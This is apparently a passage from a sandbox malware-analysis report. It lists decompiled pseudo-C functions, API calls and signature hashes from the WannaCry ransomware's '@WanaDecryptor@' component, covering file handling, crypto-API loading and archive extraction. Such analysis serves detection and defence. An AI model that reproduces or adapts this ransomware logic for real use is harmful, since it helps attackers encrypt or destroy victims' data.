																		goto L20;
																	} else {
																		SetFilePointer(_t159, 0xffff0000, 0, 2);
																		SetEndOfFile(_t159);
																		_t216 = _v608;
																		L36:
																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
																		__eflags = _v612 - 3;
																		if(_v612 == 3) {
																			_t137 = CloseHandle(_t159) | 0xffffffff;
																			__eflags = _t137;
																			_v608 = _t137;
																			_v620 = _t137;
																			MoveFileW(_a4, _a8);
																		}
																		_t224 =  *(_t223 + 0x4d4);
																		__eflags = _t224;
																		if(_t224 != 0) {
																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
																		}
																		_push(0xffffffff);
																		_push( &_v20);
																		L00413056();
																		 *[fs:0x0] = _v20;
																		return 1;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_push(_t213);
					_push( &_v20);
					L33:
					L00413056();
					 *[fs:0x0] = _v20;
					return 0;
				}
				L41:
			}




















































                                  0x004020a3
                                  0x004020a5
                                  0x004020aa
                                  0x004020b5
                                  0x004020b6
                                  0x004020c5
                                  0x004020c6
                                  0x004020cc
                                  0x004020cf
                                  0x004020d5
                                  0x004020dd
                                  0x004020e0
                                  0x004020e6
                                  0x004020ef
                                  0x004020f5
                                  0x004020fc
                                  0x00402102
                                  0x00402108
                                  0x0040210b
                                  0x0040210e
                                  0x00402114
                                  0x0040212d
                                  0x0040212f
                                  0x00402137
                                  0x00402159
                                  0x0040216e
                                  0x00402174
                                  0x00402176
                                  0x0040244c
                                  0x0040244c
                                  0x00402451
                                  0x00000000
                                  0x0040217c
                                  0x0040218c
                                  0x0040218e
                                  0x00402190
                                  0x00000000
                                  0x00402196
                                  0x004021a5
                                  0x004021ab
                                  0x004021ad
                                  0x00000000
                                  0x004021b3
                                  0x004021b3
                                  0x004021bd
                                  0x00000000
                                  0x004021c3
                                  0x004021ce
                                  0x004021dc
                                  0x004021e2
                                  0x004021e4
                                  0x00000000
                                  0x004021ea
                                  0x004021fa
                                  0x00402200
                                  0x00402202
                                  0x00000000
                                  0x00402208
                                  0x00402218
                                  0x0040221e
                                  0x00402220
                                  0x00000000
                                  0x00402226
                                  0x00402226
                                  0x0040222d
                                  0x0040230f
                                  0x00402315
                                  0x00402317
                                  0x0040231d
                                  0x00402320
                                  0x0040232f
                                  0x00402336
                                  0x00402345
                                  0x00402348
                                  0x0040234d
                                  0x0040234f
                                  0x0040238b
                                  0x0040238b
                                  0x0040238e
                                  0x00402393
                                  0x00402394
                                  0x0040239a
                                  0x004023a1
                                  0x004023a2
                                  0x004023ad
                                  0x004023b6
                                  0x004023b9
                                  0x004023bc
                                  0x004023be
                                  0x00000000
                                  0x00000000
                                  0x004023c4
                                  0x004023d1
                                  0x004023d1
                                  0x004023d7
                                  0x004023d9
                                  0x004023e0
                                  0x004023f3
                                  0x004023f9
                                  0x004023fb
                                  0x0040246f
                                  0x0040246f
                                  0x00402474
                                  0x00000000
                                  0x004023fd
                                  0x004023fd
                                  0x00402400
                                  0x00402402
                                  0x00000000
                                  0x00402404
                                  0x00402404
                                  0x00402407
                                  0x0040241c
                                  0x0040241f
                                  0x00402436
                                  0x0040243c
                                  0x0040243e
                                  0x00000000
                                  0x00402440
                                  0x00402443
                                  0x00402446
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402446
                                  0x0040243e
                                  0x00402402
                                  0x004023db
                                  0x004023db
                                  0x004023de
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004023de
                                  0x004023c6
                                  0x004023c9
                                  0x004023cb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004023cb
                                  0x00000000
                                  0x004023c4
                                  0x00402477
                                  0x0040248a
                                  0x00402491
                                  0x00000000
                                  0x00402351
                                  0x00402354
                                  0x0040235b
                                  0x0040236a
                                  0x0040236d
                                  0x00402372
                                  0x00402374
                                  0x00402381
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402374
                                  0x00402322
                                  0x00402322
                                  0x00402326
                                  0x00000000
                                  0x00402326
                                  0x00402233
                                  0x00402234
                                  0x00402253
                                  0x00402255
                                  0x0040225b
                                  0x0040225e
                                  0x00000000
                                  0x00402264
                                  0x00402274
                                  0x00402289
                                  0x0040228f
                                  0x00402291
                                  0x00000000
                                  0x00402297
                                  0x00402297
                                  0x0040229e
                                  0x00000000
                                  0x004022a4
                                  0x004022ab
                                  0x004022c0
                                  0x004022c6
                                  0x004022c8
                                  0x00402376
                                  0x00402376
                                  0x0040237b
                                  0x00000000
                                  0x004022ce
                                  0x004022ce
                                  0x004022d5
                                  0x00000000
                                  0x004022db
                                  0x004022e5
                                  0x004022e8
                                  0x004022ee
                                  0x00402497
                                  0x004024ad
                                  0x004024b3
                                  0x004024ba
                                  0x004024c3
                                  0x004024c3
                                  0x004024c6
                                  0x004024cc
                                  0x004024da
                                  0x004024da
                                  0x004024e0
                                  0x004024e6
                                  0x004024e8
                                  0x00402509
                                  0x00402509
                                  0x0040250b
                                  0x00402510
                                  0x00402511
                                  0x00402521
                                  0x0040252e
                                  0x0040252e
                                  0x004022d5
                                  0x004022c8
                                  0x0040229e
                                  0x00402291
                                  0x0040225e
                                  0x0040222d
                                  0x00402220
                                  0x00402202
                                  0x004021e4
                                  0x004021bd
                                  0x004021ad
                                  0x00402190
                                  0x00402139
                                  0x00402139
                                  0x0040213d
                                  0x00402452
                                  0x00402452
                                  0x0040245f
                                  0x0040246c
                                  0x0040246c
                                  0x00000000

                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                  • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                  • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                  • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                  • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                  • CloseHandle.KERNEL32(00000000), ref: 00402234
                                  • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                  • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                  • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                  • _local_unwind2.MSVCRT ref: 00402452
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                  • String ID: WANACRY!
                                  • API String ID: 1586634678-1240840912
                                  • Opcode ID: 99468a7adf92e140f18bc92f45e5389bbb3b22b5213984f8d8d7e9952fbc0adf
                                  • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                  • Opcode Fuzzy Hash: 99468a7adf92e140f18bc92f45e5389bbb3b22b5213984f8d8d7e9952fbc0adf
                                  • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403CB0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 122filewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
				void* _t31;
				int _t34;
				int _t37;
				intOrPtr _t39;
				int _t42;
				struct _WIN32_FIND_DATAA* _t54;
				void* _t75;
				struct _IO_FILE* _t76;
				struct _WIN32_FIND_DATAA* _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;

				_t54 = __ecx;
				_t79 = __ecx;
				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
				 *(_t81 + 8) = _t31;
				if(_t31 != 0xffffffff) {
					goto L3;
					L14:
					_t75 =  *(_t81 + 0x14);
					_t54 = _t81 + 0xdc;
					if(FindNextFileA(_t75, _t54) != 0) {
						L3:
						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
								_t81 = _t81 + 0xc;
								if(_t34 >= 1) {
									_t76 = fopen(_t81 + 0x108, "rb");
									_t81 = _t81 + 8;
									 *(_t81 + 0x18) = _t76;
									if(_t76 != 0) {
										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
										_t82 = _t81 + 0x10;
										if(_t37 == 1) {
											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
												if(_t39 != 0) {
													 *((char*)(_t82 + 0x21)) = 0x5c;
													 *((char*)(_t82 + 0x28)) = 0x5c;
													E00401C30(_t60, _t39, _t82 + 0x22);
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x143);
												} else {
													sprintf(_t82 + 0x20, "My Computer");
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x14a);
												}
												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
												_push(0x88);
												L00412CEC();
												_t84 = _t83 + 4;
												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
												_t82 = _t84 + 0xc;
												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
												_t76 =  *(_t82 + 0x18);
												_t79 =  *((intOrPtr*)(_t82 + 0x10));
											}
										}
										fclose(_t76);
										_t81 = _t82 + 4;
									}
								}
							}
						}
						goto L14;
					} else {
						FindClose(_t75);
						return 1;
					}
				} else {
					return 0;
				}
			}
















                                  0x00403cb0
                                  0x00403cbe
                                  0x00403cc6
                                  0x00403cca
                                  0x00403cd3
                                  0x00403cd7
                                  0x00403ceb
                                  0x00403e1f
                                  0x00403e1f
                                  0x00403e23
                                  0x00403e34
                                  0x00403cec
                                  0x00403cf4
                                  0x00403d06
                                  0x00403d0e
                                  0x00403d26
                                  0x00403d2c
                                  0x00403d32
                                  0x00403d4b
                                  0x00403d4d
                                  0x00403d52
                                  0x00403d56
                                  0x00403d69
                                  0x00403d6f
                                  0x00403d75
                                  0x00403d7b
                                  0x00403d7f
                                  0x00403d85
                                  0x00403d8d
                                  0x00403db4
                                  0x00403dbb
                                  0x00403dc0
                                  0x00403dc5
                                  0x00403dcc
                                  0x00403dcd
                                  0x00403dcf
                                  0x00403d8f
                                  0x00403d99
                                  0x00403d9f
                                  0x00403da6
                                  0x00403da7
                                  0x00403da9
                                  0x00403da9
                                  0x00403ddb
                                  0x00403ddd
                                  0x00403de4
                                  0x00403ded
                                  0x00403dfc
                                  0x00403dfc
                                  0x00403e0b
                                  0x00403e0d
                                  0x00403e11
                                  0x00403e11
                                  0x00403d85
                                  0x00403e16
                                  0x00403e1c
                                  0x00403e1c
                                  0x00403d56
                                  0x00403d32
                                  0x00403d0e
                                  0x00000000
                                  0x00403e3a
                                  0x00403e3b
                                  0x00403e50
                                  0x00403e50
                                  0x00403cd9
                                  0x00403ce2
                                  0x00403ce2

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$My Computer$\$\
                                  • API String ID: 1476605332-298172004
                                  • Opcode ID: 7cb988677e937bd58c99c4df6902c5c20c027946b77c77249284c9a5f5064ae7
                                  • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                  • Opcode Fuzzy Hash: 7cb988677e937bd58c99c4df6902c5c20c027946b77c77249284c9a5f5064ae7
                                  • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404B70 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00404B70() {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t20;

				if( *0x4217c0 == 0) {
					_t20 = LoadLibraryA("advapi32.dll");
					if(_t20 == 0) {
						L10:
						return 0;
					} else {
						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
						_t9 = GetProcAddress(_t20, "CryptGenKey");
						 *0x4217d4 = _t9;
						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
							goto L10;
						} else {
							return 1;
						}
					}
				} else {
					return 1;
				}
			}





                                  0x00404b78
                                  0x00404b8c
                                  0x00404b90
                                  0x00404c29
                                  0x00404c2c
                                  0x00404b96
                                  0x00404bab
                                  0x00404bb8
                                  0x00404bc5
                                  0x00404bd2
                                  0x00404bdf
                                  0x00404be4
                                  0x00404bec
                                  0x00404bf4
                                  0x00000000
                                  0x00404c22
                                  0x00404c28
                                  0x00404c28
                                  0x00404bf4
                                  0x00404b7a
                                  0x00404b80
                                  0x00404b80

                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                  • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                  • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                  • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                  • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                  • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                  • API String ID: 2238633743-2459060434
                                  • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                  • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004080C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E004080C0(intOrPtr __ecx) {
				void _v999;
				char _v1000;
				void* _v1012;
				char _v1100;
				char _v1200;
				char _v1476;
				signed char _v1520;
				intOrPtr _v1648;
				void _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1696;
				void _v1788;
				void _v1792;
				void* _v1796;
				char _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				void* _v1820;
				char _t44;
				void* _t47;
				void* _t50;
				void* _t54;
				int _t57;
				int _t60;
				int _t62;
				struct _WIN32_FIND_DATAA* _t74;
				intOrPtr _t103;
				void* _t104;
				struct _IO_FILE* _t105;
				void* _t110;
				intOrPtr _t113;
				void* _t114;
				void* _t126;

				_t103 = __ecx;
				memset( &_v1788, 0, 0x21 << 2);
				_t44 =  *0x421798; // 0x0
				_v1000 = _t44;
				_v1808 = _t103;
				memset( &_v999, 0, 0xf9 << 2);
				_t110 =  &_v1808 + 0x18;
				asm("stosw");
				_t74 =  &_v1520;
				_v1804 = 0;
				asm("stosb");
				_t47 = FindFirstFileA("*.res", _t74);
				_v1796 = _t47;
				if(_t47 == 0xffffffff) {
					L13:
					_push(_v1804);
					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
					_t113 = _t110 + 0x30;
					_push(0);
					_v1808 = _t113;
					L00412CAA();
					_t79 = _t103;
					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
					if(_t54 != 0xffffffff) {
						return _t54;
					}
					_push(0);
					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
					L00412CAA();
					return E004082C0(_t103, _t113 + 0x340, _t79);
				} else {
					goto L2;
					L11:
					_t104 = _v1796;
					_t74 =  &_v1520;
					_t57 = FindNextFileA(_t104, _t74);
					_t124 = _t57;
					if(_t57 != 0) {
						L2:
						if((_v1520 & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
								_t110 = _t110 + 0xc;
								if(_t60 >= 1) {
									_t105 = fopen( &_v1476, "rb");
									_t110 = _t110 + 8;
									if(_t105 != 0) {
										_t62 = fread( &_v1656, 0x88, 1, _t105);
										_t114 = _t110 + 0x10;
										if(_t62 == 1 && _v1648 == _v1800) {
											_v1804 = _v1804 + 1;
										}
										fclose(_t105);
										_t110 = _t114 + 4;
										if(_v1648 == 0) {
											memcpy( &_v1792,  &_v1656, 0x22 << 2);
											_t110 = _t110 + 0xc;
										}
									}
								}
							}
						}
						goto L11;
					} else {
						FindClose(_t104);
						_t103 = _v1808;
						goto L13;
					}
				}
			}







































                                  0x004080c9
                                  0x004080d7
                                  0x004080d9
                                  0x004080e3
                                  0x004080f3
                                  0x004080f7
                                  0x004080f7
                                  0x004080f9
                                  0x004080fb
                                  0x00408102
                                  0x00408110
                                  0x00408111
                                  0x0040811a
                                  0x0040811e
                                  0x0040820a
                                  0x0040821c
                                  0x00408237
                                  0x00408266
                                  0x0040826c
                                  0x00408276
                                  0x0040827b
                                  0x00408280
                                  0x00408285
                                  0x00408287
                                  0x0040828f
                                  0x004082b8
                                  0x004082b8
                                  0x00408291
                                  0x0040829d
                                  0x004082a2
                                  0x00000000
                                  0x00408124
                                  0x0040812a
                                  0x004081e4
                                  0x004081e4
                                  0x004081e8
                                  0x004081f1
                                  0x004081f7
                                  0x004081f9
                                  0x00408130
                                  0x00408138
                                  0x0040814a
                                  0x00408152
                                  0x0040816a
                                  0x00408170
                                  0x00408176
                                  0x00408187
                                  0x00408189
                                  0x0040818e
                                  0x004081a0
                                  0x004081a2
                                  0x004081a8
                                  0x004081b9
                                  0x004081b9
                                  0x004081be
                                  0x004081cb
                                  0x004081d0
                                  0x004081e2
                                  0x004081e2
                                  0x004081e2
                                  0x004081d0
                                  0x0040818e
                                  0x00408176
                                  0x00408152
                                  0x00000000
                                  0x004081ff
                                  0x00408200
                                  0x00408206
                                  0x00000000
                                  0x00408206
                                  0x004081f9

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                  • API String ID: 1530363904-2310201135
                                  • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                  • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411CF0 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 450COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E00411CF0(intOrPtr* __ecx) {
				intOrPtr _t142;
				signed int _t147;
				signed int _t149;
				intOrPtr _t150;
				void* _t152;
				signed int _t157;
				signed int _t160;
				unsigned int _t162;
				signed char _t164;
				struct _FILETIME _t177;
				struct _FILETIME _t180;
				intOrPtr _t182;
				signed int _t186;
				signed char _t188;
				struct _FILETIME _t204;
				struct _FILETIME _t212;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				intOrPtr* _t226;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				signed int _t235;
				signed int _t239;
				unsigned int _t248;
				signed int _t249;
				int _t252;
				signed char _t264;
				intOrPtr _t269;
				intOrPtr* _t273;
				signed int _t276;
				unsigned int _t297;
				signed int _t299;
				intOrPtr _t300;
				signed int _t303;
				intOrPtr _t307;
				intOrPtr _t309;
				signed int _t311;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr* _t321;
				signed int _t329;
				intOrPtr* _t336;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				void* _t343;
				void* _t346;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t312 =  *((intOrPtr*)(_t348 + 0x294));
				_t232 = _t231 | 0xffffffff;
				_t336 = __ecx;
				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
				if(_t312 < _t232) {
					L72:
					return 0x10000;
				} else {
					_t140 =  *__ecx;
					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L72;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
							E00411AC0(_t140);
							_t348 = _t348 + 4;
						}
						 *(_t336 + 4) = _t232;
						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
							__eflags = _t312 - _t232;
							if(_t312 != _t232) {
								_t142 =  *_t336;
								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
									E00411390(_t142);
									_t348 = _t348 + 4;
								}
								_t143 =  *_t336;
								__eflags =  *( *_t336 + 0x10) - _t312;
								while(__eflags < 0) {
									E004113E0(_t143);
									_t143 =  *_t336;
									_t348 = _t348 + 4;
									__eflags =  *( *_t336 + 0x10) - _t312;
								}
								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
								_t349 = _t348 + 0x30;
								__eflags = _t147;
								if(_t147 == 0) {
									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
									_t350 = _t349 + 0xc;
									__eflags = _t149;
									if(_t149 == 0) {
										_t150 =  *((intOrPtr*)(_t350 + 0x10));
										_push(_t150);
										L00412CEC();
										_t313 = _t150;
										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
										_t351 = _t350 + 0x14;
										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
											_t346 =  *(_t351 + 0x29c);
											asm("repne scasb");
											_t248 =  !_t232;
											 *_t346 =  *( *_t336 + 0x10);
											_t337 = _t351 + 0x88 - _t248;
											_t249 = _t248 >> 2;
											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
											__eflags = _t252;
											memcpy(_t337 + _t249 + _t249, _t337, _t252);
											_t353 = _t351 + 0x18;
											_t321 = _t353 + 0x190;
											while(1) {
												_t157 =  *_t321;
												__eflags = _t157;
												if(_t157 == 0) {
													goto L23;
												}
												L21:
												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
													_t321 = _t321 + 2;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												L23:
												__eflags = _t157 - 0x5c;
												if(_t157 == 0x5c) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												__eflags = _t157 - 0x2f;
												if(_t157 == 0x2f) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t41 = _t157 + 4; // 0x4
													_t321 = _t41;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t42 = _t157 + 4; // 0x4
													_t321 = _t42;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("/../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t43 = _t157 + 4; // 0x4
													_t321 = _t43;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
													goto L23;
												}
												_push("/..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t44 = _t157 + 4; // 0x4
													_t321 = _t44;
													continue;
												}
												asm("repne scasb");
												_t338 = _t321 -  !0xffffffff;
												_t297 =  *(_t353 + 0x70);
												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
												_t354 = _t353 + 0xc;
												 *((char*)(_t354 + 0x13)) = 0;
												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
												_t355 = _t354 + 0xc;
